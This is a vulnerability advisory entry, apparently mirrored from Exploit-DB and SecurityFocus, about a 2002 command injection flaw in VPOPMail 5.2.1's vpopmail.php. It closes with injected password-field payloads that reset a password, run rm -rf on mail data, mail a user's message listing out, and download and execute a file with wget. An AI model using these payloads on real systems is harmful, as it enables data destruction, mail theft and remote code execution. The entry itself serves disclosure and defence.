Command Injection in VPOPMail

vendor:

VPOPMail

by:

SecurityFocus

8.8

CVSS

HIGH

Command Injection

CWE

Product Name: VPOPMail

Affected Version From: VPOPMail 5.2.1

Affected Version To: VPOPMail 5.2.1

Patch Exists: YES

Related CWE: CVE-2002-1390

CPE: a:inter7:vpopmail

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows

2002

Command Injection in VPOPMail

VPOPMail is vulnerable to command injection due to insufficient sanitization of user-supplied input. An attacker can manipulate URI parameters to include malicious system commands, which would be executed with the privileges of the web server process.

Mitigation:

Ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7063/info

A vulnerability has been reported for VPOPMail that may allow attackers to execute arbitrary commands on a vulnerable system. The vulnerability exists due to insufficient sanitization of user-supplied input.

As the vpopmail.php script does not properly sanitize the values for the some variables, it is possible for an attacker to include malicious system commands by manipulating URI parameters. This would in turn result in the execution of these commands with the privileges of the web server process.

password;~vpopmail/bin/vpasswd user@host password
password;rm -rf ~vpopmail/
password;ls ~vpopmail/domains/example.com/user/Maildir/new| mail user@host
passwd; wget example.com/exploit -O /tmp/f;chmod +x /tmp/f;/tmp/f;